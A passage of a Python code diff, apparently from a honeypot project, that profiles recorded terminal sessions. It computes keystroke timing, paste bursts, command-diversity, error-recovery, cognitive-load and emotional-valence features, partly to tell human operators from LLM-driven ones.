    outputs: list[AsciinemaEvent],
    start: float,
    end: float,
 ) -> int:
    """Total ``len(d)`` of output events with ``start <= t < end``."""
    return sum(len(d) for t, _k, d in outputs if start <= t < end)
 def _typed_char_histograms(
    inputs: list[AsciinemaEvent],
 ) -> tuple[Mapping[str, int], Mapping[str, int], int, _LexCounters]:
    """Walk input events, build typed-only unigram + bigram histograms
    plus the Phase G lexical counters.
    Skip paste-class events (``len(data) >= PASTE_MIN_CHARS_PER_EVENT``)
    — pasted text reveals nothing about the operator's keyboard or
    sentiment. Letter bigrams chain only across consecutive ASCII-letter
    chars; a digit or punctuation character breaks the chain.
    Lexical counters (G.0): a small word buffer (≤ ``LEXEME_MAX_LEN``)
    accumulates ASCII-letter chars (case-folded). On any non-letter
    boundary, every suffix of the buffer is checked against
    ``POSITIVE_LEXEMES`` / ``NEGATIVE_LEXEMES`` / ``OBSCENITY_LEXEMES``;
    the longest match wins (so ``fucking`` counts as one obscenity hit,
    not two — ``fuck`` + ``fucking``). Caps and bang runs are tracked
    in the same walk.
    Returns ``(unigrams, bigrams, total_letters, lex_counters)``.
    """
    unigrams: dict[str, int] = {}
    bigrams: dict[str, int] = {}
    total_letters = 0
    last_letter: str | None = None
    word_buf: list[str] = []
    obscenity_hits = 0
    positive_lex_hits = 0
    negative_lex_hits = 0
    caps_run_cur = 0
    caps_run_max = 0
    bang_run_cur = 0
    bang_run_max = 0
    def _flush_word() -> tuple[int, int, int]:
        """Match longest lexeme suffix in ``word_buf``; return per-set deltas."""
        if not word_buf:
            return 0, 0, 0
        s = "".join(word_buf)
        # Longest-suffix scan against fixed lexicons.
        for length in range(min(len(s), LEXEME_MAX_LEN), 0, -1):
            suffix = s[-length:]
            if suffix in OBSCENITY_LEXEMES:
                return 1, 0, 0
            if suffix in POSITIVE_LEXEMES:
                return 0, 1, 0
            if suffix in NEGATIVE_LEXEMES:
                return 0, 0, 1
        return 0, 0, 0
    for _t, _kind, data in inputs:
        if len(data) >= PASTE_MIN_CHARS_PER_EVENT:
            # Paste boundary breaks every running counter.
            last_letter = None
            obs_d, pos_d, neg_d = _flush_word()
            obscenity_hits += obs_d
            positive_lex_hits += pos_d
            negative_lex_hits += neg_d
            word_buf.clear()
            caps_run_cur = 0
            bang_run_cur = 0
            continue
        for c in data:
            # Caps-run tracking
            if c.isascii() and c.isupper():
                caps_run_cur += 1
                if caps_run_cur > caps_run_max:
                    caps_run_max = caps_run_cur
            else:
                caps_run_cur = 0
            # Bang-run tracking
            if c == "!":
                bang_run_cur += 1
                if bang_run_cur > bang_run_max:
                    bang_run_max = bang_run_cur
            else:
                bang_run_cur = 0
            # Histogram + lexeme buffering
            if c.isascii() and c.isalpha():
                lower = c.lower()
                unigrams[lower] = unigrams.get(lower, 0) + 1
                total_letters += 1
                if last_letter is not None:
                    big = last_letter + lower
                    bigrams[big] = bigrams.get(big, 0) + 1
                last_letter = lower
                word_buf.append(lower)
                if len(word_buf) > LEXEME_MAX_LEN:
                    # Slide window — only the tail can match a lexeme.
                    word_buf[:] = word_buf[-LEXEME_MAX_LEN:]
            else:
                last_letter = None
                obs_d, pos_d, neg_d = _flush_word()
                obscenity_hits += obs_d
                positive_lex_hits += pos_d
                negative_lex_hits += neg_d
                word_buf.clear()
    # Trailing word (no boundary at end of input).
    obs_d, pos_d, neg_d = _flush_word()
    obscenity_hits += obs_d
    positive_lex_hits += pos_d
    negative_lex_hits += neg_d
    if len(bigrams) > LAYOUT_BIGRAM_TOP_N:
        top = sorted(bigrams.items(), key=lambda kv: -kv[1])[:LAYOUT_BIGRAM_TOP_N]
        bigrams = dict(top)
    return unigrams, bigrams, total_letters, _LexCounters(
        obscenity_hits=obscenity_hits,
        positive_lex_hits=positive_lex_hits,
        negative_lex_hits=negative_lex_hits,
        caps_run_max=caps_run_max,
        bang_run_max=bang_run_max,
    )
 def _output_window(
    outputs: list[AsciinemaEvent],
    start: float,
    end: float,
 ) -> tuple[int, bool, tuple[PromptLine, ...]]:
    """Walk output events in ``[start, end)`` once.
    Returns ``(byte_count, errored, prompt_lines)``. ``byte_count`` is
    the raw byte count (pre-strip); ``errored`` is the canonical-error
    -pattern match over the ANSI-stripped concatenation;
    ``prompt_lines`` is the tuple of PS1 lines detected in the same
    stripped text (Step F.0).
    PII trade-off (Phase F): the stripped text itself is dropped on
    return, but ``prompt_lines`` retains PS1 strings (capped at
    ``PROMPT_LINE_MAX_CHARS``). Only derived values leave the engine
    via observations; the prompt strings live on ``SessionContext``
    so F.1 / F.3 / E.4 can read them.
    """
    chunks: list[str] = []
    last_ts = start
    byte_count = 0
    for t, _k, d in outputs:
        if start <= t < end:
            byte_count += len(d)
            chunks.append(d)
            last_ts = t
    if not chunks:
        return 0, False, ()
    stripped = strip_ansi("".join(chunks))
    errored = detect_error_in_output(stripped)
    prompts = tuple(extract_prompt_lines(
        stripped, base_ts=last_ts, max_chars=PROMPT_LINE_MAX_CHARS,
    ))
    return byte_count, errored, prompts
 def build_session_context(
    events: Iterable[AsciinemaEvent],
    *,
    sid: str,
    source: str,
    evidence_ref: str | None = None,
 ) -> SessionContext:
    """Single-pass build of the SessionContext for ``events``."""
    inputs: list[AsciinemaEvent] = []
    outputs: list[AsciinemaEvent] = []
    t_first: float | None = None
    t_last: float = 0.0
    for ev in events:
        t, kind, _ = ev
        if t_first is None:
            t_first = t
        if t > t_last:
            t_last = t
        if kind == "i":
            inputs.append(ev)
        elif kind == "o":
            outputs.append(ev)
    if t_first is None:
        t_start = 0.0
        t_end = 0.0
    else:
        t_start = t_first
        t_end = t_last
    iats: tuple[float, ...] = tuple(
        max(0.0, inputs[i][0] - inputs[i - 1][0]) for i in range(1, len(inputs))
    )
    paste_bursts, paste_count = _detect_paste_bursts(inputs)
    typing_bursts = _split_typing_bursts(iats)
    backspace_count, backspace_iats, kill_line_count = _scan_correction_signals(inputs)
    commands = _segment_commands(inputs)
    commands, prompt_lines = _annotate_commands_with_output(commands, outputs)
    inter_cmd_iats = tuple(
        max(0.0, commands[i + 1].start_ts - commands[i].end_ts)
        for i in range(len(commands) - 1)
    )
    output_per_cmd = tuple(
        _output_bytes_between(outputs, commands[i].end_ts, commands[i + 1].start_ts)
        for i in range(len(commands) - 1)
    )
    intra_command_iats = _per_command_iats(commands, inputs)
    typed_uni, typed_bi, typed_letters, lex = _typed_char_histograms(inputs)
    return SessionContext(
        sid=sid,
        source=source,
        evidence_ref=evidence_ref or f"session:{sid}",
        t_start=t_start,
        t_end=t_end,
        duration_s=max(0.0, t_end - t_start),
        input_events=tuple(inputs),
        output_events=tuple(outputs),
        iats=iats,
        paste_bursts=paste_bursts,
        paste_event_count=paste_count,
        commands=commands,
        inter_cmd_iats=inter_cmd_iats,
        output_per_cmd=output_per_cmd,
        typing_bursts=typing_bursts,
        backspace_count=backspace_count,
        backspace_iats=backspace_iats,
        kill_line_count=kill_line_count,
        intra_command_iats=intra_command_iats,
        prompt_lines=prompt_lines,
        typed_unigram_counts=typed_uni,
        typed_bigram_counts=typed_bi,
        typed_letter_count=typed_letters,
        obscenity_hits=lex.obscenity_hits,
        positive_lex_hits=lex.positive_lex_hits,
        negative_lex_hits=lex.negative_lex_hits,
        caps_run_max=lex.caps_run_max,
        bang_run_max=lex.bang_run_max,
    )
--- a/decnet/profiler/behave_shell/_features/init.py
+++ b/decnet/profiler/behave_shell/_features/init.py
@@ -0,0 +1,104 @@
 """Registered feature functions.
 Each entry takes a ``SessionContext`` and yields zero or more
 ``Observation`` instances. Adding a primitive = adding a function in a
 sibling module and appending it to ``FEATURES``.
 """
 from __future__ import annotations
 from typing import Callable, Iterable
 from behave_core.spec.envelope import Observation
 from decnet.profiler.behave_shell._ctx import SessionContext
 from decnet.profiler.behave_shell._features.cognitive import (
    cognitive_load,
    command_branch_diversity,
    error_resilience_fallback_to_man,
    error_resilience_frustration_typing,
    error_resilience_retry_tactic,
    exploration_style,
    feedback_loop_engagement,
    planning_depth,
    tool_vocabulary,
    inter_command_consistency,
    inter_command_latency_class,
 )
 from decnet.profiler.behave_shell._features.emotional_valence import (
    arousal,
    frustration_venting,
    stress_response,
    valence,
 )
 from decnet.profiler.behave_shell._features.environmental import (
    keyboard_layout,
    locale,
    numpad_usage,
    shell_type,
    terminal_multiplexer,
 )
 from decnet.profiler.behave_shell._features.operational import (
    cleanup_behavior,
    multi_actor_indicators,
    objective,
    opsec_discipline,
 )
 from decnet.profiler.behave_shell._features.temporal import (
    escalation_pattern,
    exit_behavior,
    landing_ritual,
    session_duration,
 )
 from decnet.profiler.behave_shell._features.motor import (
    command_chunking,
    error_correction,
    input_modality,
    keystroke_cadence,
    motor_stability,
    paste_burst_rate,
    pipe_chaining_depth,
    shortcut_usage,
    tab_completion,
 )
 FeatureFn = Callable[[SessionContext], Iterable[Observation]]
 FEATURES: tuple[FeatureFn, ...] = (
    input_modality,
    paste_burst_rate,
    keystroke_cadence,
    motor_stability,
    error_correction,
    command_chunking,
    tab_completion,
    shortcut_usage,
    pipe_chaining_depth,
    inter_command_latency_class,
    command_branch_diversity,
    feedback_loop_engagement,
    inter_command_consistency,
    cognitive_load,
    exploration_style,
    planning_depth,
    tool_vocabulary,
    error_resilience_retry_tactic,
    error_resilience_frustration_typing,
    error_resilience_fallback_to_man,
    session_duration,
    escalation_pattern,
    landing_ritual,
    exit_behavior,
    shell_type,
    terminal_multiplexer,
    locale,
    keyboard_layout,
    numpad_usage,
    objective,
    opsec_discipline,
    cleanup_behavior,
    multi_actor_indicators,
    valence,
    arousal,
    stress_response,
    frustration_venting,
 )
--- a/decnet/profiler/behave_shell/_features/_emit.py
+++ b/decnet/profiler/behave_shell/_features/_emit.py
@@ -0,0 +1,32 @@
 """Helper for building registry-valid :class:`Observation` records.
 Every feature module would otherwise repeat the same Window /
 source / evidence_ref boilerplate. This helper centralises it and is
 the one place to reach when emission semantics change (e.g. when we
 start parametrising windows on a per-primitive basis).
 """
 from __future__ import annotations
 from typing import Any
 from behave_core.spec.envelope import Observation, Window
 from decnet.profiler.behave_shell._ctx import SessionContext
 def make_observation(
    ctx: SessionContext,
    *,
    primitive: str,
    value: Any,
    confidence: float,
 ) -> Observation:
    """Build one :class:`Observation` for the whole-session window."""
    return Observation(
        primitive=primitive,
        value=value,
        confidence=confidence,
        window=Window(start_ts=ctx.t_start, end_ts=ctx.t_end),
        source=ctx.source,
        evidence_ref=ctx.evidence_ref,
    )
--- a/decnet/profiler/behave_shell/_features/cognitive.py
+++ b/decnet/profiler/behave_shell/_features/cognitive.py
@@ -0,0 +1,593 @@
 """``cognitive.*`` feature functions.
 Step 5: ``cognitive.inter_command_latency_class``.
 Step 6: ``cognitive.command_branch_diversity``.
 Step 7: ``cognitive.feedback_loop_engagement``.
 Step 8: ``cognitive.inter_command_consistency``.
 Step D.1: ``cognitive.cognitive_load``.
 """
 from __future__ import annotations
 import statistics
 from typing import Iterator
 from behave_core.spec.envelope import Observation
 from decnet.profiler.behave_shell._ctx import SessionContext
 from decnet.profiler.behave_shell._features._emit import make_observation
 from decnet.profiler.behave_shell._parse import hash_token
 from decnet.profiler.behave_shell._thresholds import (
    BRANCH_DIVERSITY_LINEAR_MIN,
    COGNITIVE_LOAD_CHUNKING_REF_CV,
    COGNITIVE_LOAD_LOW_MAX,
    COGNITIVE_LOAD_MEDIUM_MAX,
    COGNITIVE_LOAD_PACE_REF_CV,
    EXPLORATION_CHAOTIC_BACKTRACK_MIN,
    EXPLORATION_TARGETED_REP_MIN,
    FEEDBACK_CORRELATION_MIN,
    FEEDBACK_MIN_PAIRS,
    FRUSTRATION_LOW_MAX,
    FRUSTRATION_MODERATE_MAX,
    IKI_THINK_MAX_S,
    INTER_CMD_DELIBERATE_MAX,
    INTER_CMD_INSTANT_MAX,
    INTER_CMD_LLM_HEAVYWEIGHT_MAX,
    INTER_CMD_LLM_LIGHTWEIGHT_MAX,
    INTER_CMD_TYPING_MAX,
    MIN_COMMANDS_FOR_FULL_CONFIDENCE,
    PAUSE_CV_BIMODAL_MIN,
    PAUSE_CV_METRONOMIC_MAX,
    PLANNING_DEEP_MIN,
    PLANNING_REACTIVE_MIN,
    TOOL_VOCAB_BROAD_MIN,
    TOOL_VOCAB_NARROW_MAX,
 )
 # Precomputed at import time so the per-session hot loop is a set
 # membership check, not 3 sha256 ops per command. The ``--help`` /
 # ``-h`` flag forms can't be detected here — they're not first tokens
 # (PII discipline keeps only the *first* token's hash). v0.2 will
 # reconsider once corpus calibration justifies storing arg-token
 # hashes too.
 _HELP_FAMILY_HASHES: frozenset[str] = frozenset({
    hash_token("man"),
    hash_token("help"),
    hash_token("info"),
 })
 def _clip01(x: float) -> float:
    if x < 0.0:
        return 0.0
    if x > 1.0:
        return 1.0
    return x
 def _cv(xs: tuple[float, ...] | list[float]) -> float | None:
    """Coefficient of variation; ``None`` if undefined (n<2 or mean==0)."""
    if len(xs) < 2:
        return None
    mean = statistics.fmean(xs)
    if mean <= 0.0:
        return None
    return statistics.stdev(xs) / mean
 def _bucket_inter_cmd_latency(median_iat: float) -> str:
    if median_iat <= INTER_CMD_INSTANT_MAX:
        return "instant"
    if median_iat <= INTER_CMD_TYPING_MAX:
        return "typing_speed"
    if median_iat <= INTER_CMD_DELIBERATE_MAX:
        return "deliberate"
    if median_iat <= INTER_CMD_LLM_LIGHTWEIGHT_MAX:
        return "llm_lightweight"
    if median_iat <= INTER_CMD_LLM_HEAVYWEIGHT_MAX:
        return "llm_heavyweight"
    return "long"
 def inter_command_latency_class(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.inter_command_latency_class``.
    Operator's *thinking pace* between commands, bucketed against
    calibrated thresholds. Splits LW-sim / CLAUDE-FF / CLAUDE-CL.
    """
    if not ctx.inter_cmd_iats:
        return
    median_iat = statistics.median(ctx.inter_cmd_iats)
    bucket = _bucket_inter_cmd_latency(median_iat)
    # Sample-size honesty: < 5 commands → halve confidence
    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.80
    yield make_observation(
        ctx,
        primitive="cognitive.inter_command_latency_class",
        value=bucket,
        confidence=confidence,
    )
 def command_branch_diversity(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.command_branch_diversity``.
    Content-based discriminator (no timing): unique first-token ratio
    over total commands. Splits CLAUDE-FF (linear_playbook) from
    CLAUDE-CL (adaptive_branching). The empirical anchor on
    2026-05-02: fire-and-forget runs ~10 distinct tools; closed-loop
    runs 5-6 with ``curl`` re-invoked as the operator chases threads.
    """
    n = len(ctx.commands)
    if n == 0:
        # No commands at all → nothing honest to say. Skip emission.
        return
    if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        # Registry admits "unknown"; absence of *enough* data is itself
        # a high-confidence answer.
        yield make_observation(
            ctx,
            primitive="cognitive.command_branch_diversity",
            value="unknown",
            confidence=1.0,
        )
        return
    unique = len({c.first_token_hash for c in ctx.commands})
    ratio = unique / n
    if ratio >= BRANCH_DIVERSITY_LINEAR_MIN:
        value = "linear_playbook"
    else:
        # Anything below the linear floor is treated as adaptive — the
        # operator is reusing tools, the discriminative signal we
        # actually want.
        value = "adaptive_branching"
    yield make_observation(
        ctx,
        primitive="cognitive.command_branch_diversity",
        value=value,
        confidence=0.80,
    )
 def feedback_loop_engagement(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.feedback_loop_engagement``.
    Pearson correlation between ``output_per_cmd[i]`` (bytes the
    operator saw before the next command) and
    ``inter_cmd_iats[i]`` (the pause that followed). closed_loop
    operators read more before pausing more; fire_and_forget operators
    pace independently of output. CUTS ACROSS the LLM/human axis —
    closed-loop LLMs and reading humans both score closed_loop.
    First primitive that depends on output events: zero output events
    in the shard → emit ``unknown`` at confidence 1.0 (no honest
    correlation possible) and exit.
    """
    pairs = list(zip(ctx.output_per_cmd, ctx.inter_cmd_iats))
    if not ctx.output_events or len(pairs) < FEEDBACK_MIN_PAIRS:
        if not ctx.commands:
            return
        yield make_observation(
            ctx,
            primitive="cognitive.feedback_loop_engagement",
            value="unknown",
            confidence=1.0,
        )
        return
    xs = [float(p[0]) for p in pairs]
    ys = [float(p[1]) for p in pairs]
    try:
        r = statistics.correlation(xs, ys)
    except statistics.StatisticsError:
        # Constant series on either axis — correlation undefined.
        yield make_observation(
            ctx,
            primitive="cognitive.feedback_loop_engagement",
            value="unknown",
            confidence=1.0,
        )
        return
    if r > FEEDBACK_CORRELATION_MIN:
        value = "closed_loop"
    else:
        value = "fire_and_forget"
    yield make_observation(
        ctx,
        primitive="cognitive.feedback_loop_engagement",
        value=value,
        confidence=0.75,
    )
 def error_resilience_fallback_to_man(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.fallback_to_man``.
    For each errored command, check whether the operator's next
    command is ``man`` / ``help`` / ``info`` — i.e. they reached for
    the manual rather than re-trying or pivoting. If at least one
    errored command triggered this fallback → ``present``; otherwise
    ``absent``.
    Skip emission when no commands errored — the registry's binary
    has no ``unknown``, and emitting ``absent`` from no observation
    at all would be dishonest.
    The ``--help`` / ``-h`` flag forms can't fire this primitive in
    v0.1: they aren't first tokens, and the engine only retains
    ``first_token_hash`` per command (PII discipline). Filed for v0.2.
    """
    errored_indices = [i for i, c in enumerate(ctx.commands) if c.errored]
    if not errored_indices:
        return
    fallback_count = 0
    for i in errored_indices:
        if i + 1 >= len(ctx.commands):
            continue
        if ctx.commands[i + 1].first_token_hash in _HELP_FAMILY_HASHES:
            fallback_count += 1
    value = "present" if fallback_count > 0 else "absent"
    if len(errored_indices) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.65
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.fallback_to_man",
        value=value,
        confidence=confidence,
    )
 def error_resilience_frustration_typing(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.frustration_typing``.
    Compares median within-command IAT for commands *following* an
    errored command against the same statistic for commands following
    a successful command. A large relative delta indicates the operator
    typed differently after a failure — speed-up (rage / fluency) or
    slowdown (caution); both are signs of arousal.
    Skip emission when either group is empty (no errors, or every
    command errored — no clean baseline). Sample-size honesty drops
    confidence below the floor.
    """
    post_err: list[float] = []
    post_ok: list[float] = []
    cmds = ctx.commands
    intra = ctx.intra_command_iats
    if len(cmds) < 2 or len(intra) != len(cmds):
        return
    for i in range(1, len(cmds)):
        cmd_iats = intra[i]
        if not cmd_iats:
            continue
        m = statistics.median(cmd_iats)
        if cmds[i - 1].errored:
            post_err.append(m)
        else:
            post_ok.append(m)
    if not post_err or not post_ok:
        return
    median_err = statistics.median(post_err)
    median_ok = statistics.median(post_ok)
    if median_ok <= 0.0:
        return
    delta = abs(median_err - median_ok) / median_ok
    if delta < FRUSTRATION_LOW_MAX:
        value = "low"
    elif delta < FRUSTRATION_MODERATE_MAX:
        value = "moderate"
    else:
        value = "high"
    if len(post_err) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.60
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.frustration_typing",
        value=value,
        confidence=confidence,
    )
 def error_resilience_retry_tactic(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.retry_tactic``.
    For each command with ``Command.errored=True``, classify the
    operator's response by the *next* command:
    * **rerun** — same first_token_hash as the errored command. The
      operator re-invoked the same tool (often after fixing args
      mid-edit, but we can't see args).
    * **switch** — different first_token_hash. Pivoted to a different
      tool.
    * **abort** — no next command. Session ended after the error.
    The session's reported tactic is the **modal** response across all
    errored commands (with ties broken in registry order: rerun >
    modify > switch > abort). Skip emission entirely when no commands
    errored — the registry has no ``unknown`` here, and silence is the
    most honest answer.
    The ``modify`` value (edit-and-retry) requires within-command
    diffing of arg tokens, which crosses the PII boundary the engine
    holds (only ``first_token_hash`` is retained per command). v0.1
    therefore never emits ``modify``; v0.2 will once the PII trade-off
    is revisited against a real attacker corpus.
    """
    errored = [(i, c) for i, c in enumerate(ctx.commands) if c.errored]
    if not errored:
        return
    counts = {"rerun": 0, "switch": 0, "abort": 0}
    for i, cmd in errored:
        if i + 1 >= len(ctx.commands):
            counts["abort"] += 1
        elif ctx.commands[i + 1].first_token_hash == cmd.first_token_hash:
            counts["rerun"] += 1
        else:
            counts["switch"] += 1
    # Registry-order tiebreak (rerun > modify > switch > abort).
    # `modify` deferred — never increments here.
    order = ("rerun", "switch", "abort")
    value = max(order, key=lambda k: counts[k])
    if len(errored) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.65
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.retry_tactic",
        value=value,
        confidence=confidence,
    )
 def tool_vocabulary(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.tool_vocabulary`` ∈ {narrow, moderate, broad}.
    Absolute count of distinct first_token_hashes. Skip emission when
    no commands exist; below the sample-size floor we still emit, but
    at confidence 0.40 — a session with few commands but five distinct
    tools is genuinely a moderate-vocabulary signal.
    """
    if not ctx.commands:
        return
    distinct = len({c.first_token_hash for c in ctx.commands})
    if distinct <= TOOL_VOCAB_NARROW_MAX:
        value = "narrow"
    elif distinct >= TOOL_VOCAB_BROAD_MIN:
        value = "broad"
    else:
        value = "moderate"
    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.70
    yield make_observation(
        ctx,
        primitive="cognitive.tool_vocabulary",
        value=value,
        confidence=confidence,
    )
 def planning_depth(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.planning_depth`` ∈ {deep, shallow, reactive}.
    Read off the distribution of inter-command IATs:
    * **deep** — many think-pauses (> ``IKI_THINK_MAX_S``). The
      operator stops to think between commands.
    * **reactive** — most pauses are sub-instant
      (≤ ``INTER_CMD_INSTANT_MAX``). Knee-jerk pacing — automated
      runner, prepared playbook, or an LLM with no internal latency.
    * **shallow** — neither: mostly typing-speed pauses, no extended
      contemplation.
    Skip emission when no inter-command IATs exist (one or zero
    commands); the registry has no ``unknown`` for this primitive.
    """
    iats = ctx.inter_cmd_iats
    if not iats:
        return
    n = len(iats)
    deep_count = sum(1 for x in iats if x > IKI_THINK_MAX_S)
    reactive_count = sum(1 for x in iats if x <= INTER_CMD_INSTANT_MAX)
    deep_frac = deep_count / n
    reactive_frac = reactive_count / n
    if deep_frac >= PLANNING_DEEP_MIN:
        value = "deep"
    elif reactive_frac >= PLANNING_REACTIVE_MIN:
        value = "reactive"
    else:
        value = "shallow"
    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.65
    yield make_observation(
        ctx,
        primitive="cognitive.planning_depth",
        value=value,
        confidence=confidence,
    )
 def exploration_style(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.exploration_style`` ∈ {methodical, chaotic, targeted}.
    Two-axis classification over the first_token_hash sequence:
    * **methodical** — low repetition, low backtracks. Operator marches
      forward through new tools.
    * **targeted** — high repetition (R ≥ EXPLORATION_TARGETED_REP_MIN).
      Same tool re-invoked repeatedly; the operator is drilling.
    * **chaotic** — high backtrack rate (J ≥ EXPLORATION_CHAOTIC_BACKTRACK_MIN).
      Jumps among previously-used tools without a clear thread.
    The registry doesn't permit ``unknown``; below the
    MIN_COMMANDS_FOR_FULL_CONFIDENCE floor we emit at confidence 0.40
    rather than skip — the engine has *some* signal, just less of it.
    Skip emission only when there are no commands at all.
    """
    n = len(ctx.commands)
    if n == 0:
        return
    hashes = [c.first_token_hash for c in ctx.commands]
    unique = len(set(hashes))
    repetition_rate = 0.0 if n == 0 else 1.0 - (unique / n)
    # Backtrack: at position i, hashes[i] previously seen at index < i-1
    # and not equal to hashes[i-1]. (Repeating the immediate predecessor
    # is "drilling", picked up by repetition_rate; backtrack is the
    # non-local jump signal.)
    seen_before: set[str] = set()
    backtracks = 0
    transitions = 0
    if hashes:
        seen_before.add(hashes[0])
    for i in range(1, n):
        transitions += 1
        if hashes[i] != hashes[i - 1] and hashes[i] in seen_before:
            backtracks += 1
        seen_before.add(hashes[i])
    backtrack_rate = (backtracks / transitions) if transitions else 0.0
    if backtrack_rate >= EXPLORATION_CHAOTIC_BACKTRACK_MIN:
        value = "chaotic"
    elif repetition_rate >= EXPLORATION_TARGETED_REP_MIN:
        value = "targeted"
    else:
        value = "methodical"
    if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        confidence = 0.60
    yield make_observation(
        ctx,
        primitive="cognitive.exploration_style",
        value=value,
        confidence=confidence,
    )
 def cognitive_load(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.cognitive_load`` ∈ {low, medium, high}.
    Composite of three [0, 1]-clipped sub-signals, mean-aggregated:
    * **chunking** — median CV of intra-command IATs / reference CV.
      Fragmented mid-command typing → high contribution.
    * **errors** — fraction of commands whose post-execution output
      matched a canonical error fingerprint (``Command.errored`` from
      Step D.0). Failures pile load.
    * **pace variability** — CV of inter-command IATs / reference CV.
      A spread of think-pause durations → unsettled cadence → load.
    Components missing data contribute 0.0 (no penalty for an absent
    signal), and the composite normalises by *available* component
    count so a session with zero inter-command pauses isn't punished
    for the silence. Skip emission entirely when no commands at all
    exist — there's no honest answer.
    v0.1 thresholds; D.8 re-tunes once the rest of Phase D is stable.
    """
    if not ctx.commands:
        return
    # Component A: chunking variance — median within-command CV
    per_cmd_cvs: list[float] = []
    for cmd_iats in ctx.intra_command_iats:
        cv = _cv(cmd_iats)
        if cv is not None:
            per_cmd_cvs.append(cv)
    if per_cmd_cvs:
        chunking_load: float | None = _clip01(
            statistics.median(per_cmd_cvs) / COGNITIVE_LOAD_CHUNKING_REF_CV
        )
    else:
        chunking_load = None
    # Component B: error rate
    error_load: float = sum(1 for c in ctx.commands if c.errored) / len(ctx.commands)
    error_load = _clip01(error_load)
    # Component C: pace variability — CV of inter-command IATs
    pace_cv = _cv(ctx.inter_cmd_iats)
    if pace_cv is not None:
        pace_load: float | None = _clip01(pace_cv / COGNITIVE_LOAD_PACE_REF_CV)
    else:
        pace_load = None
    components = [c for c in (chunking_load, error_load, pace_load) if c is not None]
    if not components:
        return
    load = sum(components) / len(components)
    if load < COGNITIVE_LOAD_LOW_MAX:
        value = "low"
    elif load < COGNITIVE_LOAD_MEDIUM_MAX:
        value = "medium"
    else:
        value = "high"
    if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        confidence = 0.40
    else:
        # Composite over three soft sub-signals — held below the
        # cap of single-source primitives. D.8 re-tunes.
        confidence = 0.60
    yield make_observation(
        ctx,
        primitive="cognitive.cognitive_load",
        value=value,
        confidence=confidence,
    )
 def inter_command_consistency(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.inter_command_consistency``.
    CV (stdev / mean) of inter-command IATs.
    * ``metronomic`` (CV < 0.40) → LLM-pure. Empirical anchor:
      LLM-simulated session CV ≈ 0.24 in this corpus.
    * ``variable`` (0.40 ≤ CV < 1.50) → human. Empirical anchor:
      human session CV ≈ 0.94.
    * ``bimodal`` (CV ≥ 1.50) → LLM-assisted human, heuristic. v0.1
      uses CV-only; true bimodal detection (Hartigan dip / two-peak)
      is filed for v0.2 per the registry's ``notes:`` field.
    """
    iats = ctx.inter_cmd_iats
    if len(iats) < 2:
        return
    mean = statistics.fmean(iats)
    if mean <= 0.0:
        return
    cv = statistics.stdev(iats) / mean
    if cv < PAUSE_CV_METRONOMIC_MAX:
        value = "metronomic"
    elif cv >= PAUSE_CV_BIMODAL_MIN:
        value = "bimodal"
    else:
        value = "variable"
    confidence = (
        0.40 if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE else 0.75
    )
    yield make_observation(
        ctx,
        primitive="cognitive.inter_command_consistency",
        value=value,
        confidence=confidence,
    )
--- a/decnet/profiler/behave_shell/_features/emotional_valence.py
+++ b/decnet/profiler/behave_shell/_features/emotional_valence.py
@@ -0,0 +1,223 @@
 """``emotional_valence.*`` feature functions (Phase G, soft block).
 All four primitives in this module ride a hard 0.5 confidence cap
 (:data:`EMOTIONAL_VALENCE_CONFIDENCE_CAP`). Cap is enforced inside
 the feature functions, *not* via :func:`make_observation` — sample-size
 honesty may still pull confidence below 0.5.
 Step G.5: ``emotional_valence.valence``.
 Step G.6: ``emotional_valence.arousal`` (lands later).
 Step G.7: ``emotional_valence.stress_response`` (lands later).
 Step G.8: ``emotional_valence.frustration_venting`` (lands later).
 """
 from __future__ import annotations
 import statistics
 from typing import Iterator
 from behave_core.spec.envelope import Observation
 from decnet.profiler.behave_shell._ctx import SessionContext
 from decnet.profiler.behave_shell._features._emit import make_observation
 from decnet.profiler.behave_shell._thresholds import (
    AROUSAL_BANG_RUN_MIN,
    AROUSAL_CALM_IAT_S,
    AROUSAL_CAPS_RUN_MIN,
    AROUSAL_FAST_IAT_S,
    AROUSAL_MIN_IATS,
    EMOTIONAL_VALENCE_CONFIDENCE_CAP,
    FRUST_VENT_FULL_CONFIDENCE_MIN,
    FRUST_VENT_MIN_TYPED_CHARS,
    STRESS_DISTRESS_RATIO_MIN,
    STRESS_EUSTRESS_RATIO_MIN,
    STRESS_MIN_ERRORED_WITH_IATS,
    VALENCE_FULL_CONFIDENCE_MIN,
    VALENCE_MIN_HITS,
    VALENCE_MIN_TYPED_CHARS,
 )
 def _cap_soft(c: float) -> float:
    """Clamp confidence to the soft-primitive ceiling."""
    return min(c, EMOTIONAL_VALENCE_CONFIDENCE_CAP)
 def valence(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.valence`` ∈ {positive, neutral, negative}.
